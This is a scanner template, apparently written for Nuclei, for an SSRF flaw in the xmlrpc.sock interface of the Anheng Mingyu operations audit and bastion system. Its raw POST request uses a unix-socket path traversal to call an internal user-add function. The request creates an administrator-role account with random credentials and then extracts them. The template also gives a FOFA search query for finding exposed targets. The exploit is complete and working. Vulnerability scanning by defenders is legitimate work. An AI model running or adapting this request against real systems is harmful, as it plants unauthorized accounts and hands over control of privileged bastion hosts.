id: mingyu-xmlrpc-sock-adduser info: name: Mingyu Operation xmlrpc.sock - User Addition author: SleepingBag945 severity: high description: | There is an SSRF vulnerability in the xmlrpc.sock interface of Anheng Mingyu operation and maintenance audit and risk control system, through which any user can be added to control the bastion machine reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/dbappsecurity-mingyu-xmlrpc-sock-adduser.yaml - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%AE%89%E6%81%92/%E5%AE%89%E6%81%92%20%E6%98%8E%E5%BE%A1%E8%BF%90%E7%BB%B4%E5%AE%A1%E8%AE%A1%E4%B8%8E%E9%A3%8E%E9%99%A9%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%BB%9F%20xmlrpc.sock%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 verified: true fofa-query: "明御运维审计与风险控制系统" tags: mingyu,xmlrpc,sock,intrusive,misconfig variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" random: "{{rand_base(4)}}" http: - raw: - | POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://{{random}}/wsrpc HTTP/1.1 Host: {{Hostname}} web.user_add admin 5 10.0.0.1 uname {{username}} name {{username}} pwd {{password}} authmode 1 deptid email mobile comment roleid 102 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/xml") && contains(body, "rolename") && contains(body, "authmode")' condition: and extractors: - type: dsl dsl: - '"USERNAME: "+ username' - '"PASSWORD: "+ password'